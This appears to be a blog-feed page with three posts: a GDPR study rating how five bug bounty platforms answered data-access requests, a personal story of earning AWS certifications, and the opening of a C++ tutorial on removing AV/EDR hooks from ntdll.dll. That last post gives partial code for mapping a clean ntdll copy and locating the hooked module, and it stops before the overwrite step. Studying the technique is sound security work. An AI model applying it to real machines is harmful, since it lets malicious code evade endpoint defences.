Normal view

There are new articles available, click to refresh the page.
Before yesterdayUncategorized

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I do care a lot about data protection and privacy things. I’ve also been in the situation, where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, respectively, their answer, is part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR):
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare the responses that are quite different in style, completeness, accuracy, and thoroughness, I’ve decided to only count answers that are a part of the official answer. After the official response, discussions are not considered here, because accepting those might create advantages across competitors. This should give a clear understanding of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

Indicator Expectation
All good, everything provided, expectations met.
Improvable, at least one (obvious) piece of information is missing, only implicitly answered.
Left out, missing a substantial amount of data or a significant data point and/or unmet expectations.

This light system is then applied to the different GDPR questions and derived points either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the lights indicators. For a detailed explanation of the indicators, have a look at the detailed response evaluations below.

Question HackerOne Bugcrowd Synack Intigriti Zerocopter
Did the platform meet the deadline?
(Art. 12 par. 3 GDPR)
Did the platform explicitly validate my identity for all provided email addresses?
(Art. 12 par. 6 GDPR)
Did the platform hand over the results for free?
(Art. 12 par. 5 GDPR)
Did the platform provide a full copy of my data?
(Art. 15 par. 3 GDPR)
Is the provided data accurate?
(Art. 5 par. 1 (d) GDPR)
Specific question: Which personal data about me is stored and/or processed by you?
(Art. 15 par. 1 (b) GDPR)
Specific question: What is the purpose of processing this data?
(Art. 15 par. 1 (a) GDPR)
Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)?
(Art. 15 par. 1 (c) GDPR)
Specific question: If the personal data wasn’t supplied directly by me, where does it originate from?
(Art. 15 par. 1 (g) GDPR)
Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR?
(Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was/were not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording/how long those are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search in it for personal data (it’s also not used for anything according to HackerOne)
What is the purpose of processing this data? Operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, To analyze the use of the Services in order to understand how we can improve our content and service offerings and products, For administrative and other business purposes, Matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third-party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I’ve received quite a huge JSON file, which was quite easily parsable using your preferred scripting language. However, if a non-technical person would receive the data this way, they’d probably have issues getting useful information out of it.

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a couple of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses see your sessions on your Bugcrowd profile), my ISC2 membership number, everything around the identity verification.

There might be more data points such as logs collected through their (for some programs) required proxies or VPN endpoints, which is required by some programs, but no information was provided about that.

Bugcrowd did neither provide anything about all other given email addresses, nor did they deny to have anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. Address information, as well as email addresses and payment information are super old (it does not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file, as shown above. I was astonished about the compactness of the answer and asked again to answer all the provided questions as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I’ve mentioned more than once that the provided data is inaccurate and incomplete and that they’ve left out most of the questions, which I have a right by law to get an answer to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 03th July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint”, respectively “LaunchPoint+” which requires every participant to go through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack did neither provide anything about all other given email addresses nor did they deny to have anything related to them.

Since I do consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry data, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a couple of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned, but still processed.

“Log information” in the context of “Account information” and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team” are too vague since it could be anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and due to the added proofs, I can confirm that it has been signed within the deadline set for their GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & lastname, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active anymore since then, so I do not consider this data point anymore.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After gathering for clarification, Intigriti told me that they’re only hosting in the Europe region in regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes Zerocopter validated all email addresses that I’ve mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First-, last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “ These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter did only cite their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, it seems that European bug bounty platforms like Intigriti and Zerocopter generally do better or rather seem to be better prepared for incoming GDPR requests than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne has handed over this data after their official response, Intigriti and Zerocopter have not explicitly answered that question. However, both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it’s probably a rather rarely asked question.

See you next year ;-)

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head) typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected with AWS leading (~34%) Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth is double that (62%) of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practicioner. This involves a ton of sophisticated research better known as Google 🤣 in addition to, trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometime I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason  in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was most challenging cert of folks lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them?  One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one  you go for it’s pretty much going deeper into the usage, capabilities of appropriate related services. I chose to sit for C01 although C02 was recently released I wasn’t going to risk being a live beta tester. I was concerned with the newer exams’ stability. As I write this C01 is officially dead in 3 days, July 1 2020 then all candidates will only have C02 good luck 🤣.

Date: Monday 05/014/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retook it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall 🤣) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know  after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!

via GIPHY


Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through Linux Academy course. After that, I brought John Bonso course at tutorialsdojo.

Listen. LISTEN. 🗣🔊 LISTEN  The length of these questions are in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I forgot all the things I had learned from the course, I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case i failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs I don’t know why but I went back to the exam scheduling and saw they had a exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.

via GIPHY

Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimal sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending exam this time! There was maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like play Russian roulette. I changed about 9 answers total each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2, 3 out of 6,7 selections. The questions are random from a bank like most of the exams so I’m not sure if same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

Majority of the exam was exactly that reading, understanding policies – IAM, KMS, Bucket policies you better be able to read and understand them as if they were plain English. There was a ton of KMS related things, make SURE you know the nitty gritty like imported key material, all the different type of KMS encryption types when, where, rotation ect.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor 😂 (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I brought myself AWAE as a birthday gift I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a systemcall to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump at the beginning of the function into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow will jump back to the original functional call so that the function performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 1, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

handle hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

